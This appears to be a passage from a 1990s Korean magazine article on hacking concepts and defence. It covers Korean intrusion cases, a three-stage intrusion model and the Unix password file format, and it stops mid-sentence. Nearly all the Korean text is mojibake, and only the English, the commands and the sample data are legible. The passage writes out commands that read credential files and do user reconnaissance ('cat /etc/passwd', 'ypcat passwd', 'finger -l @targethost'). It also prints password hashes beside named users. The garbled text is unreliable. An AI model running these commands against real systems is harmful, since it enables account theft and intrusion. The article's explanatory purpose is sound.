ÇØÅ· ¹ý
ÇØÅ· ±âº» °³³ä Àâ±â
°ú°ÅÀÇ ÇØÅ· »ç·Ê
ÃÖ±ÙÀÇ ÇØÅ· À¯Çü°ú ¹æÁöÃ¥
-½º´ÏÇΰú IP ½ºÇªÇÎ
º¸¾È °ü·Ã FAQ
´ÙÀ½È£
À¯¿ëÇÑ ½ÃÅ¥¸®Æ¼ üũ Åø
º¸¾È°ü·Ã ´Üü ¼Ò°³
ÀÎÅͳÝÀÇ °³¹æ¼º°ú Á¤º¸°øÀ¯ ¹× ±³È¯ÀÇ ¿ëÀ̼ºÀ¸·Î ÀÎÇØ
ÀÎÅͳݻçÀÇ ÇØÅ·»ç°ÇÀº ³¯·Î ±× ºóµµ¼ö°¡ ³ô¾Æ°¡¸ç ±× À¯Çü ¶ÇÇÑ °í µµÈÇÏ°í ±×·Î
ÀÎÇÑ ÇÇÇØÀÇ ½É°¢¼ºÀº ÇÏ·ç°¡ ´Ù¸£°Ô º¯¸ðÇÏ°í ÀÖ´Ù. ƯÁýII¿¡¼´Â
5¿ùÈ£¿Í 6¿ùÈ£ µÎ´Þ¿¡ °ÉÃÄ ÇØÅ·¹æÁö Å×Å©´ÐÀ» ±âȹÇß´Ù. À̸¦ ÅëÇØ
ÇØÅ·ÆÐÅÏÀÇ º¯È¸¦ »ìÆ캸°í, ÃÖ±Ù¿¡ ÀϾ°í ÀÖ´Â ±¸Ã¼ÀûÀÎ
ÇØÄ¿ ħÀÔ°æ·Î¿Í ÇüÅÂ, ±×¸®°í ±×¿¡ ´ëÇÑ ¹æ ÁöÃ¥À» ÀÚ¼¼È÷ µé¿©´Ùº¸±â·Î ÇÑ´Ù.
Ãʺ¸ÀÚµéÀÇ ÀÌÇظ¦ µ½±â À§ÇØ ÇØÅ·°ú º¸¾È¿¡ °ü·ÃÇÑ °³°ýÀûÀÎ
³»¿ëÀº ¿ù°£ Internet 95³â 7¿ù È£ºÎÅÍ 11¿ùÈ£¸¦ ÂüÁ¶Çϱ⠹ٶõ´Ù.
³ëÁ¤¼® ±èÈÖ° Á¶¿ë»ó ÃÖÀçö / KUS ȸ¿ø
ÇØÅ·ÀÇ ±âº» °ñ°ÝÀ» ÀâÀÚ!
Àü»êÇаúÀÎ K±ºÀº Çаú ¼ºÀûÀÌ ¾ÆÁÖ ÁÁÁö ¸øÇÏ´Ù. ÇÏ Áö¸¸
½Ç·Â¸¸Àº ´©±¸º¸´Ùµµ ÀÖ´Ù°í ÀںνÉÀ» °¡Áö°í ÀÖ´Ù. ÇÏÁö¸¸ ¼ºÀûÀÌ ³ª»Ú´Ù´Â
ÀÌÀ¯¸¸À¸·Î ¾Æ¹«µµ ÀÎÁ¤À» ÇØÁÖÁö ¾ÊÀÚ ÀڱⰡ ÀÎÁ¤¹ÞÀ»
¼ö ÀÖ´Â °÷Àº °¡»ó¼¼°è»ÓÀ̶ó°í »ý°¢
ÇÏ°Ô µÆ´Ù. ±× µÚ·Î K±ºÀÌ ¿À» ¿Ã¸®°Ô µÈ °ÍÀº
ÇØÅ·À̾ú´Ù. K±ºÀº ½É½ÉÇÏ°í ¹«·á ÇÔÀ» ´Þ·¡±â À§ÇØ ´ëÇüÅë½Å¸Á¿¡¼
äÆÃÀ» Áñ±â°í ÀÖ´Ù.
öÀúÇÏ°Ô À§ÀåÇØ ÀÚ½ÅÀÇ ½ÅºÐÀ» °¨Ãáä R¾ç°ú äÆÃÀ» Áñ±â°í
ÀÖ´Ù. R¾çÀÇ ÁÖ¼Ò¿Í ºñ¹Ð¹øÈ£ µîÀ» Á¶»çÇØ ±×³à¸¦ ³î¶ó°Ô Çϸç Áñ °Å¿ò¿¡
ºüÁø´Ù. R¾çÀÇ Áֹεî·Ï¹øÈ£¸¦ ¾Ë¾Æ³» ÀºÇà°øµ¿¸Á¿¡¼ ±×³àÀÇ
°èÁ¸¦ ÃßÀû, ÀڽŰú äÆÃÇÑ '´ë°¡'·Î µ·À» ÀÚ½ÅÀÇ ±¸Á·ΠÀÌüÇÑ´Ù.
¾Æ, ±×·¡µµ ½É½ÉÇÏ´Ù. ¸ð ´ëÇп¡ µé¾î°¡ ÇлýµéÀÇ ¼ºÀûÀ»
¿¶÷ÇÑ´Ù. °íµîÇб³¶§ ºÎÅÍ ²Ãº¸±â ½È´ø ³ðÀÌ ÀÖ¾ú´Ù. ±× ³à¼®ÀÇ ¼º ÀûÀ» ¸ðµÎ
F·Î ¸¸µé¾î¹ö¸°´Ù. ¼ÓÀÌ Á» ÈÄ·ÃÇÏ´Ù. ¾Æ.. ½É½ÉÇØ. ´õ
¹»ÇÒ±î...
À§ÀÇ ³»¿ëÀº ¾î¶² ÇлýÀÌ Å»¼±ÀÇ ±æ·Î ºüÁø °ÍÀ» °¡»óÀ¸·Î
²Ù¸çº» ±ÛÀÌ´Ù. ÃÖ±Ùµé¾î ÇØÅ·À̶õ ´Ü¾î¸¦ »ç¶÷µéÀÌ ¸¹ÀÌ Á¢ÇÏ°í´Â ÀÖÁö¸¸ Á¤È®È÷
¾î¶°ÇÑ ¶æÀ» °®°í ÀÖ°í ÇØÅ·¿¡´Â ¹«¾ùÀÌ ÀÖ´ÂÁö Á¤È®È÷
¾Æ´Â »ç¶÷µéÀº ±×·¸°Ô ¸¹Áö ¾Ê´Ù. ¿ÀÈ÷·Á ¾ð·ÐÀÇ ÇØ Å·¿¡ ´ëÇÑ ¿Àº¸ ¶§¹®¿¡ ÀÎÅͳݿ¡
´ëÇÑ À߸øµÈ ¼±ÀÔ°üÀ» °®°Ô ÇÏ´Â ¼öµµ ÀÖ´Â °ÍÀÌ´Ù.
À§ÀÇ °¡»óÀÇ ±Û¿¡¼ º¸ÀÎ ¿¹´Â ÇØÄ¿¿¡ ´ëÇÑ À߸øµÈ ÀνÄÀÌ
´ã°ÜÀÖ´Ù. ±×·¸´Ù¸é ÇØÅ·À̶õ ¹«¾ùÀΰ¡? ÁøºÎÇÑ ¸éÀÌ ÀÖ±ä ÇÏÁö¸¸ hacker's
dictionay¸¦ ÂüÁ¶Çϱâ·Î ÇÏÀÚ.
Hacker: 1. A person who enjoys
learning the details of computer systems
and
how to stretch their capabilities - as opposed to most users of
computers, who prefer to learn
only the minimum amount necessary.
2.One who programs enthusiastically
or who enjoys programming rather
than just theorizing about programming.
- Guy L.Steele. et al. The Hacker's
Dictionary
ÇØÄ¿¶õ, ÄÄÇ»ÅÍ¿¡ Á¤¿À» °¡Áö°í ¿½ÉÈ÷ ¸ôµÎÇÏ´Â »ç¶÷µéÀ»
¶æÇÑ´Ù. ¿ÀÈ÷·Á ¾ð·Ð¿¡¼³ª Àϻ󿡼 ¶°µ¹°í ÀÖ´Â ÇØÄ¿¶ó´Â ´Ü¾î´Â
Å©·¡Ä¿(Cracker)³ª ½Ã½ºÅÛħÀÔÀÚ(system intruder)ÀÇ ¶æ¿¡
´õ °¡±õ´Ù°í ÇÒ ¼ö ÀÖ´Ù.
ÃÖ±Ù¿¡´Â °¢Á¾ ¾ð·ÐÀ̳ª ±â°ü¿¡¼ ÇØÅ·¿¡ »ó´çÈ÷ ¹Î°¨ÇÑ
¹ÝÀÀÀ» º¸ÀÌ°í ÀÖ´Â °ÍÀÌ ¿äÁò µé¾î »ó´çÈ÷ Å©°í ÀÛÀº ÇØÅ· »ç°ÇµéÀÌ ÀÚÁÖ ÀϾ±â
¶§¹®ÀÌ´Ù. ÀÎÅͳÝÀÌ È®»êµÊ¿¡ µû¶ó ÀÌ·¯ÇÑ Çö»óÀº ´õ¿í
µÎµå·¯Áú °ÍÀ¸·Î º¸ÀδÙ.
ÇØÅ·¿¡ ´ëºñÇÑ °¡Àå ¹«¼¿î ¹æ¾î¹ýÀº ¹é¾÷ÀÌ ¾Æ´Ò±î ½Í´Ù.
ÀÌ´Â ¹°·Ð °¡Àå ±âº»ÀûÀÎ ´ëºñÃ¥À̱⵵ ÇÏ´Ù. "Çϵåµð½ºÅ©¸¦ ¹Ð ¾î¹ö¸®·Á¸é
¹Ð¾îºÁ¶ó. ¿ì¸®´Â ³¯¸¶´Ù ¹é¾÷ ¹Þ´Â´Ù³×" "¾îÁ¦
Áö¿ì°í °¬À¸¸é ¿À´Ã ¶Ç »ì·Á³õÀ¸¸é µÇÁö ¹¹." ÀÌ·¸°Ô µÈ´Ù¸é ÇØÅ·ÇÒ ¸ÀÀÌ ³¯±î?
ÇØÅ·
¹æÁö¹ýÀ» ÀÍÈ÷±â¿¡ ¾Õ¼ °£´ÜÈ÷ ±¹³»¿¡¼ ÀϾ¾ú´ø ÇØÅ·
»ç·ÊµéÀ» »ìÆ캸°í ÀÌÀüÀÇ ÇØÅ·À¯Çü °ú ÃֽŠÇØÅ· »ç·ÊµéÀ» ÀÚ¼¼È÷ »ìÆ캻´Ù.
±¹³»¿¡¼ ¹ß»ýÇÑ ÇØÅ· »ç·Ê
SERI(½Ã½ºÅÛ °øÇÐ ¿¬±¸¼Ò)ÀÇ ½´ÆÛÄÄ
¼¾Åͳ» CRAY 2S¿¡ ÇØÄ¿°¡ ħÀÔ, ½Ã½ºÅÛÀ» ±³¶õÇÑ ¿¹. (1992)
¼¿ï´ëÇб³ Àü»ê¼¾ÅÍ¿¡ ÇØÄ¿µéÀÌ
¼¿ï´ëÀÇ LAN¿¡ ħÀÔÇØ ¿öÅ©½ºÅ×ÀÌ¼Ç 6´ëÀÇ ¸ðµç Çϵåµð½ºÅ©¸¦ Áö¿ö¹ö¸° ¿¹. (1993)
Çѱ¹Åë½Å¿¬±¸°³¹ß¼¾ÅÍ, Çϳª¸Á
°ü¸®¼¾ÅÍ¿¡¼µµ ¼¿ï´ë¿Í À¯»çÇÑ »ç°ÇÀÌ ¹ß»ý (1993)
¿øÀÚ·Â ¿¬±¸¼Ò¿¡ ¿µ±¹ ¼Ò³âÇØÄ¿°¡
ħÀÔ(»ç½ÇÀº ÀÌ¿Í À̸§ÀÌ ºñ½ÁÇÑ ´ëÇÐÀÇ È£½ºÆ®¿¡ ħÀÔÇÑ °ÍÀÌÁö¸¸ ¾ð·ÐµéÀÇ ÇãÀ§,°úÀ庸µµ·Î
À߸ø
¾Ë·ÁÁø »ç°Ç)ÇØ ÇÏµå µð½ºÅ©ÀÇ
Á¤º¸°¡ ¿ÜºÎ¿¡ °³¹æµÆ´ø »ç°Ç (1994)
Çѱ¹ Àü»ê¿ø, KRNIC(Çѱ¹ ¸ÁÁ¤º¸¼¾ÅÍ)
ÇØÅ·»ç°Ç:±¹³» ³×Æ®¿öÅ© Á¤º¸¼¹ö¿¡ ÇØÄ¿°¡ ħÀÔÇÑ »ç°Ç (1994)
¼°´ëÇб³ÀÇ ¾ÆÅ°¼¹ö¿¡ ħÅõÇØ
µð½ºÅ©¸¦ Áö¿ö¹ö¸° »ç°Ç (1994)
KAIST ÇØÅ· »ç°Ç:¿µ¾î±ÇÀÇ ÇØÄ¿°¡
ħÅõÁß KUS(KAIST Unix Security task force)¸â¹ö¿¡ °Ô Àû¹ßµÈ ¿¹
À§ÀÇ »ç°ÇµéÀº ½Å¹®Áö»ó¿¡¼ ¸¹ÀÌ Á¢Çغ» °ÍµéÀÌ´Ù. ¹°·Ð
Å©°í ÀÛÀº ÇØÅ· »ç°Ç
ÀÌ ¹«¼öÈ÷ ¸¹ÀÌ ÀϾ¾úÁö¸¸ ±½Á÷ÇÑ »ç°Çµé¸¸ ³ª¿Çß´Ù.ÀÌ¿Í
°°ÀÌ ¸¹Àº º¸¾È »ç°ÇÀÌ ¹ú¾îÁö´Â »óȲ¿¡¼ ½Ã½ºÅÛÀÇ °ü¸®ÀÚ³ª
»ç¿ëÀÚÀÇ ÀÔÀå¿¡¼ ¹«¾ùÀ» Çؾ߸¸ÀÌ ÇØÄ¿µéÀÇ Ä§ÀÔ À» ¸·À» ¼ö ÀÖÀ»±î? ¶ÇÇÑ
µ¶µµ´Â ÀڱⶥÀ̶ó°í ¿ì°Ü´ë´Â ¾â¹Ì¿î ÀϺ»ÀÇ Àü»ê¸ÁÀ»
¹«·ÂȽÃÅ°·Á¸é ¾î¶² ÀÛ¾÷À» ÇØ¾ß ÇÒ°¡? ÇÏÁö¸¸ µ¶ÀÚµéÀÌ ¿ì¼± ÀÌÇØÇϱ⠽±µµ·Ï ±âÃÊÀûÀÎ
³»¿ëÀ» ¸ÕÀú Àû¾î ³õÀ»±î ÇÑ´Ù.
ÇØÅ·ÀÇ °³³ä°ú Á¾·ù
´ëºÎºÐÀÇ ½Ç·ÂÀÖ´Â ÇØÄ¿µéÀº ´Ù¸¥ ½Ã½ºÅÛ¿¡ ħÅõ¸¦ ÇÏ´õ¶óµµ
´ëÀǸíºÐ(?)ÀÌ ÀÖ´Â °æ¿ì°¡ ´Ù¹Ý»ç´Ù. ÀڱⰡ °ü¸®ÇÏ´Â ½Ã½ºÅÛ¿¡ ´Ù¸¥ ÇØÄ¿°¡
µé¾î¿Í¼, À̸¦ ½Å¼ÓÈ÷ ÃßÀûÇϱâ À§ÇØ ¿ªÇØÅ·ÇÏ´Â °æ¿ìÀÇ
¿¹¸¦ µé ¼ö ÀÖ°Ú´Ù. ¶ÇÇÑ ¾î´À Á¤µµ ½Ç·ÂÀÖ´Â ÇØÄ¿µéÀÇ °æ ¿ì¿¡´Â ÇØÄ¿¸®Áò¿¡ °üÇÑ
°ÇÀüÇÑ ¸¶Àε尡 Çü¼ºµÅ ÀÖ´Â »ç¶÷µéÀÌ ¸¹±â ¶§¹®¿¡ À̵éÀÌ
Ȥ½Ã Àڱ⠽ýºÅÛ¿¡ ÇÇÇظ¦ ÀÔÈ÷Áö ¾ÊÀ»±î °ÆÁ¤ÇÒ ÇÊ¿ä´Â ¾ø´Ù.
´Ù¸¸ °ÆÁ¤ÀÌ µÇ´Â °ÍÀº Áß°í»ýµéÀÌ ÄÄÇ»Åͳª À¯´Ð½º¿¡ °üÇÑ
Àü¹®ÀûÀÎ Áö½Äµµ ¾øÀ¸¸é¼ ¸·¿¬ÇÑ °ø¸í½É°ú ¾û¶×ÇÑ ¿µ¿õ½É¿¡ ÈÛ¾µ·Á ÇØÅ·À» ÇÏ°Ô
µÇ´Â °æ¿ìÀÌ´Ù. À̵éÀº ¾î¼´Ù ±¸ÇÑ ÇØÅ·ÅøÀ» ÀÌ¿ëÇØ, ÇØÅ·À»
Çϸç ÀڽŵéÀÌ Ä§Åõ¸¦ Çß´Ù´Â Áõ°Åµµ Áö¿ì°í ³ª°¡Áö ¸øÇÏ´Â °æ¿ì°¡ ´ëºÎºÐÀÌ´Ù.
ÀÌ·¯ÇÑ »óȲ¿¡¼ Áß°í»ýµéÀÌ ¿ì¿¬È÷ ħÅõÇÏ°Ô µÇ¾ú´Ù°¡
ÀâÈ÷°Ô µÇ¸é ±×µéÀÇ Àλý¿¡´Â ¾î´Àµ¡ Àü°úÀÚ ¶ó´Â ±â·ÏÀÌ ³²°Ô µÇ´Â °ÍÀÌ´Ù.¤Ô
ÇØÅ·À̶õ ¹ý·üÀûÀÎ Àǹ̿¡¼ º¸¸é '½Ã½ºÅÛÀÇ °ü¸®ÀÚ°¡ ±¸ÃàÇØ
³õÀº º¸¾È¸ÁÀ» ¾î¶² ¸ñÀû¿¡¼°Ç ¹«·ÂȽÃÄ×À» °æ¿ì ÀÌ¿¡
µû¸¥ ¸ð µç ÇൿÀ»
ÇØÅ·À̶ó°í ÇÑ´Ù.'°í µÅÀÖ´Ù. ÇÏÁö¸¸ ³×ƼÁ𰣿¡´Â º¸Åë
½Ã½ºÅÛ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ºÒ¹ýÀûÀ¸·Î ȹµæÇÑ °æ¿ì, ¶Ç À̸¦ ¾Ç ¿ëÇØ ´Ù¸¥ »ç¿ëÀÚ¿¡°Ô
ÇÇÇظ¦ ÁØ °æ¿ì¸¦ ÇØÅ·À̶ó°í Á¤ÀÇÇÏ°í ÀÖ´Ù. (°£´ÜÇÑ ÇØÅ·À¸·Î
¾î¶² »ç¿ëÀÚÀÇ Æнº¿öµå¸¦ ÃßÃøÀ» ÅëÇؼ °Ç, ¿ì¿¬È÷ ¾Ë°Ô µÇ¾î¼°Ç µµ¿ëÀ»
ÇÏ°Ô µÆÀ» °æ¿ì¸¦ µé ¼ö ÀÖ´Ù.)
ÇØÅ·ÀÇ 3´Ü°è ÀýÂ÷
¾î¶² È£½ºÆ®¸¦ ÇØÅ·Çϱâ À§Çؼ´Â º¸Åë 3´Ü°è ÀýÂ÷¸¦ °ÅÄ¡°Ô
µÈ´Ù. 1´Ü°è·Î ¸ñÇ¥·Î ÇÑ È£½ºÆ® ³»ºÎ¿¡ ÀâÀÔÀ» ÇÏ¿© ½©(shell)À» »ç¿ëÇÒ
¼ö ÀÖ´Â À¯ÀúÀÇ ±ÇÇÑÀ» ¾ò¾î ³»´Â °ÍÀÌ´Ù. À̸¦ ½ÇÇàÇϱâ
À§ÇØ À¯ÀúÀÇ Æнº¿öµå¸¦ ¾Ë¾Æ¾ß Çϴµ¥, ½º´ÏÇÁ(sniff)¸¦ ÀÌ¿ë ÇÏ´Â
°í±Þ¹æ¹ý¿¡¼ºÎÅÍ, finger -l @targethost¸¦ ÇØ ¾Ë¾Æ³½
»ç¿ëÀÚµéÀÇ Æнº¿öµå¸¦ ÃßÃøÇØ ·Î±äÇÏ´Â ¹«½ÄÇÑ ¹æ¹ý±îÁö ¾ÆÁÖ ´Ù¾ç ÇÑ
¹æ¹ýÀÌ ÀÖ´Ù.
º¸ÅëÀÇ ÇØÄ¿¶ó¸é ¿ÜºÎ¿¡¼ ¸ñÇ¥·Î ÇÑ È£½ºÆ®ÀÇ Æнº¿öµå
ÆÄÀÏÀ» »©¿Í¼ À̸¦ ÀÌ¿ëÇØ ¸ñÇ¥·Î ÇÑ È£½ºÆ® ³»ºÎÀ¯Àú·Î ħÀÔÇÏ´Â °Í ÀÌ º¸ÅëÀÌ´Ù.
±×¸®°í ÀÌ 1´Ü°è¸¦ ¹æ¾îÇÏ´Â °ÍÀÌ ¹Ù·Î ³×Æ®¿öÅ© ½ÃÅ¥¸®Æ¼ÀÌ´Ù.
2´Ü°è·Î ¸ñÇ¥·Î Çß´ø È£½ºÆ® ³»ºÎ¿¡ ÀâÀÔÀ» ÇßÀ¸¸é ¸ñÇ¥
È£½ºÆ®ÀÇ °ü¸®ÀÚ(root)ÀÇ ±ÇÇÑÀ» ȹµæÇÏ·Á°í ½ÃµµÇÒ °ÍÀÌ´Ù. À̴ ȣ½º Æ®
³»ºÎÀÇ OS Ȧ(hole)À» ÀÌ¿ëÇÏ´Â °æ¿ì°¡ ¸¹´Ù. ¶ÇÇÑ ÀÌ 2´Ü°è¸¦
¹æ¾îÇÏ´Â °ÍÀÌ ¹Ù·Î ·ÎÄà ½ÃÅ¥¸®Æ¼ÀÌ´Ù.
3´Ü°è´Â È£½ºÆ® °ü¸®ÀÚ(root)ÀÇ
±ÇÇÑÀ» ȹµæÇÑµÚ ÀÚ½ÅÀÌ ´ÙÀ½¿¡ ´Ù½Ã ħÀÔÇÒ °æ¿ì¿¡ ÆíÀǼºÀ» ±âÇϱâ À§ÇØ backdoor(µÞ¹®)À»
¸¸
µé¾î ³õ°í ³ª°¡´Â ´Ü°èÀÌ´Ù. ¸Å¹ø ¸ñÇ¥·Î ÇÑ È£½ºÆ®¿¡ ÀâÀÔÇϱâ
À§ÇØ ¹ø¹øÈ÷ ÇØÅ·À» ½ÃµµÇÑ´Ù¸é Áõ°Å¸¦ ¾ðÁ¨°¡ ³²±â±â ¸¶·ÃÀÌ°í '²¿¸®°¡
±æ¾îÁ®¼' °á±¹Àº ÀâÈ÷±â ¸¶·ÃÀÌ´Ù. ÀڽŸ¸ÀÌ »ç¿ëÇÒ ¼ö
ÀÖ´Â ³»ºÎ ¹ö±×(Æ®·ÎÀÌ ¸ñ¸¶)¸¦ ³²°Ü³õ°í °¡´Â °ÍÀÌ Ä§ÀÔ¶§ Áõ °Å¸¦ ³²±âÁö ¾Ê´Â
ÁÁÀº ¹æ¹ýÀ̱⠶§¹®¿¡ ÇØÄ¿µéÀº À̸¦ ¾Ö¿ëÇÏ°í ÀÖ´Ù.
ÇØÅ·ÀÇ ÀÌÇظ¦ µ½±âÀ§ÇÑ À¯´Ð½º »óÀÇ ±âÃÊ»ó½Ä
ÀÌÁ¦ºÎÅÍ ³ª¿À´Â ³»¿ëµéÀº ÇØÅ·À» ÀÌÇØÇϱâ À§ÇÑ À¯´Ð½º»óÀÇ
±âÃÊ Áö½ÄÀÌ´Ù.
Æнº¿öµå´Â ¾î¶»°Ô °ü¸®µÇ´Â°¡?
º¸Åë µµ¿ëÇÑ ID¸¦ ÀÌ¿ëÇØ ´Ù¸¥ ½Ã½ºÅÛÀ̳ª IDÀÇ ¼ÒÀ¯ÁÖ°¡
»ç¿ëÇÏ°í ÀÖ´Â ½Ã½ºÅÛÀÇ °ü¸®ÀÚ(root, Super user)ÀÇ ÀÚ°ÝÀ»
¾ò¾î³»±â À§ÇÑ ¹ßÆÇÀ¸·Î »ï´Â °æ¿ì°¡ ÀÖ´Ù. ±×·¯¹Ç·Î ÀÚ½ÅÀÇ
µµ¿ë´çÇÑ ID ¶§¹®¿¡ ÇÇÇظ¦ º» ÂÊ¿¡¼ Á¶»ç¸¦ ÇÑ´Ù¸é ÀÚ½ÅÀÌ ÇÏÁöµµ ¾ÊÀº ÀÏ
¿¡ ÀǽÉÀ» »ç°Ô µÉ ¼öµµ ÀÖ°Ô µÇ´Â °ÍÀÌ´Ù.
¶ÇÇÑ ID¸¦ µµ¿ë´çÇϸé ÀڽŸ¸ÀÇ ÇÇÇØ·Î ³¡³ª´Â ÀÏÀÌ ¾Æ´Ñ
½Ã½ºÅÛÀÇ ÇÇÇرîÁöµµ ¾ß±âÇÒ ¼ö Àֱ⠶§¹®¿¡ Æнº¿öµå¸¦ °ËÁõÇÏ´Â Àý Â÷¸¦ µÎ¾î
Æнº¿öµå¸¦ ¸ð¸£´Â ¿ÜºÎÀÎÀº »ç¿ëÇÏÁö ¸øÇϵµ·Ï ¸·°í ÀÖ´Â
°ÍÀÌ´Ù.
ÇÏÁö¸¸ ÀÌ Æнº¿öµå¸¦ »ç¿ëÇÏ°í ÀÖ´Ù ÇÏ´õ¶ó
µµ ¹®Á¦´Â ÀÖ´Ù. ¸¸ÀÏ ´Ù¸¥»ç¶÷µµ ÃæºÐÈ÷ ÃßÃøÇس¾ ¼ö
ÀÖ´Â °ÍÀ¸·Î Æнº¿öµå¸¦ Á¤Çß ´Ù¸é ´Ù¸¥
»ç¶÷ÀÌ ¸¶À½¸¸ ¸ÔÀ¸¸é ÀÚ½ÅÀÇ ID¸¦ »ç¿ëÇÒ ¼ö ÀÖÀ¸¹Ç·Î
¹«¿ëÁö¹°ÀÌ µÇ´Â °ÍÀÌ´Ù. ±×·¡¼ ÀÚ½ÅÀÇ Æнº¿öµå¸¦ °ü¸®ÇÏ´Â °Í¿¡ ´ëÇØ ¸»Çغ¼±î
ÇÑ´Ù.
À¯´Ð½º ½Ã½ºÅÛÀº °¢ À¯ÀúµéÀÇ Æнº¿öµå ¹× ±âŸ Á¤º¸¸¦
/etc/passwd¿¡ º¸°üÇÏ°íÀÖ´Ù. vi³ª catÀ» ÀÌ¿ëÇØ ÀÌ ÆÄÀÏÀ» »ìÆ캸ÀÚ.(
´Ü, º¸´Â ¹æ¹ýÀÌ ¾î¶² ½Ã½ºÅÛÀ» ¾²´À³Ä¿¡ µû¶ó ´Ù¸£´Ù.
À§ÀÇ °ÍÀº ÀϹÝÀûÀÎ °æ¿ìÀÌ°í À§¿¡ ³ª¿Â NIS ½Ã½ºÅÛÀº NFS ½Ã½ºÅÛ°ú ÇÔ²² °°ÀÌ
µÚ¿¡¼ ¼³¸íÇÏ°íÀÚ ÇÑ´Ù.)
NIS ½Ã½ºÅÛÀ» ÀÌ¿ëÇÏ´Â °æ¿ì:
cat /etc/passwd³ª ypcat passwd¸¦ ÇÑ´Ù.
NetInfo ½Ã½ºÅÛÀ» ÀÌ¿ëÇÏ´Â °æ¿ì:
nidump passwd / ¸¦ ÇÑ´Ù.
¿¹½Ã·Î ¸îÁÙ¸¸ µé¾îº¸ÀÚ.
root:##root:0:0:Supervisor:/:/bin/csh
daemon:##daemon:1:1::/:
uucp:##uucp:4:8::/var/spool/uucppublic:
kwlee:##kwlee:104:30:KyeongWon
Lee:/circ/kus/kwlee:/usr/local/bin/tcsh
sakai:##sakai:129:30:Kim Huy
kang:/circ/kus/sakai:/usr/local/bin/tcsh
hohle:##hohle:11529:410:Hoh
eun ha:/under/under/hohle:/bin/csh
sungho:##sungho:13189:410:Park
sung ho :/under/under/sungho:/bin/csh
À§¿Í °°ÀÌ : À¸·Î ±¸ºÐµÈ µÎ¹ø° ºÎºÐÀÌ À§¿Í °°ÀÌ µÅÀÖ´Â
°æ¿ìµµ ÀÖÀ» °ÍÀÌ°í ¶Ç´Â
root:VRLoJ2QnLhRA2:0:0:Supervisor:/:/bin/csh
daemon:*1:1::/::
uucp:*:4:8::/var/spool/uucppublic:
kwlee:ntim9ljaUGI.A:104:30:KyeongWon
Lee:/circ/kus/kwlee:/usr/local/bin/tcsh
sakai:tdtwKgRa3ZZoI:129:30:Kim
Huy
kang:/circ/kus/sakai:/usr/local/bin/tcsh
hohle:u2WKlqINaIP8w:11529:410:Hoh
eun ha:/under/under/hohle:/bin/csh
sungho:eATMm4J0Zb4Dw:13189:410:Park
sung ho
:/under/under/sungho:/bin/csh
À§¿Í °°Àº °æ¿ìµµ ÀÖÀ» °ÍÀÌ´Ù. µÎ ÆÄÀÏÀ» Çѹø »ìÆ캸ÀÚ
. ù ¼¼ÁÙÀº root,daemon,uucp¶ó´Â ½Ã½ºÅÛ °èÁ¤(account)¿¡
°üÇÑ Á¤º¸ ÀÌ°í ±× ´ÙÀ½¿¡ ³ª¿À´Â ÁÙµéÀº kwlee³ª sakai
°°Àº ½Ã½ºÅÛÀÇ ÀÏ¹Ý À¯Àúµé¿¡ °üÇÑ Á¤º¸ÀÌ´Ù. °¢°¢ÀÇ ÁÙÀº : À» ±âÁØÀ¸·Î
´ÙÀ½°ú °°Àº 7°³ÀÇ Çʵå(field)·Î ³ª´¶´Ù.
1 Field : À¯Àú À̸§
2 Field : À¯ÀúÀÇ Æнº¿öµå(º¸Åë
º¸¿©ÁÖÁö ¾Ê°Å³ª ¾Ë¾Æº¸Áö ¸øÇÏ°Ô º¯Çü½ÃÄÑ ³õ´Â´Ù.)
3 Field : À¯ÀúÀÇ ID number(UID)
4 Field : À¯Àú°¡ ¼ÓÇØÀÖ´Â ±×·ìÀÇ
ID number(GID)
5 Field : À¯ÀúÀÇ ½ÇÁ¦ À̸§
6 Field : À¯ÀúÀÇ È¨ µð·ºÅ丮
7 Field : À¯Àú°¡ »ç¿ëÇÏ´Â Shell
±× ¿¹¸¦ µé¾îº¸ÀÚ. À§¿¡¼ sakai¶õ »ç¶÷À» »ìÆ캸¸é
sakai:##sakai:129:30:Kim Huy
kang:/circ/kus/sakai:/usr/local/bin/tcsh
sakai:tdtwKgRa3ZZoI:129:30:Kim
Huy
kang:/circ/kus/sakai:/usr/local/bin/tcsh
À¯ÀúÀ̸§: sakai
password: ##sak
ai(ÀǵµÀûÀ¸·Î Æнº¿öµå ºÎºÐÀ» ¼û±ä °æ¿ì->Shadowing
passwd ¶ó°íµµ ¸»ÇÑ´Ù.)
tdtwKgRa3ZZoI(º¯Çü½ÃÄѼ ¾ËÁö
¸øÇÏ°Ô ÇÑ °æ¿ì.º¸Åë encrypt(¾ÏÈ£È)½ÃÄ×´Ù°í ¸»ÇÑ´Ù.)
UID : 129
GID : 30
½ÇÁ¦ À¯ÀúÀÇ À̸§: Kim Huy kang
À¯ÀúÀÇ È¨µð·ºÅ丮:/circ/kus/sakai
À¯Àú°¡ »ç¿ëÇÏ´Â ½©: tcsh
À§¿Í °°Àº Á¤º¸¸¦ ¾òÀ» ¼ö°¡ ÀÖ´Ù.
Æнº¿öµå´Â ¾î¶»°Ô ¸¸µé¾îÁö´Â°¡?
±×·³ À§ÀÇ º¯ÇüµÈ ºÎºÐÀº ¾î¶»°Ô »ý¼ºµÇ´Â °ÍÀϱî? ´ÙÀ½À»
¼öÇà½ÃÄѺ¸ÀÚ.
% /usr/lib/makekey iakasbells
lsDy0cB/5/zho>
% /usr/lib/makekey sakaixvaaa
aaxuEmMgYNZz2>
µÎ¹øÀÇ ½ÇÇà°á°ú¸¦ ºñ±³ÇØ º¸ÀÚ. °øÅëÁ¡Àº ÀÔ·ÂÇÑ ±Û¼èÁß¿¡¼
³¡¿¡¼ µÎ¹ø°ºÎÅÍÀÇ ±Û¾¾´Â ´ÙÀ½ ÁÙÀÇ ¾ÏÈ£ÈµÈ ºÎºÐ¿¡ ±×´ë·Î ÂïÇô ³ª¿À°í
³ª¸ÓÁö ºÎºÐÀº ¾Ë¾Æº¸Áö ¸øÇÏ°Ô º¯ÇüµÇ¾î ³ª¿Â °ÍÀ» ¾Ë
¼ö ÀÖ´Ù. À§ÀÇ ¿¹¿¡¼ ÀÔ·ÂÇÑ ´Ü¾î iakasbellsÀÇ ¸¶Áö¸· µÎ ±ÛÀÚ ls¿Í
´ÙÀ½¿¡ º¯ÇüµÈ ´Ü¾î lsDy0cB/5/zho>ÀÇ
ù ls¿Í °°´Ù.
ÀÌ ¸¶Áö¸· µÎ ±ÛÀÚµéÀ» key character(ȤÀº salt)¶ó°í ÇÑ´Ù.
ÀÌ·± ¹æ½ÄÀ¸·Î ·Î±×Àγ×ÀÓÀ» ÀÔ·ÂÇÑ ÈÄ Æнº¿öµå¸¦ ÀÔ·ÂÇÏ¸é ¸Ç
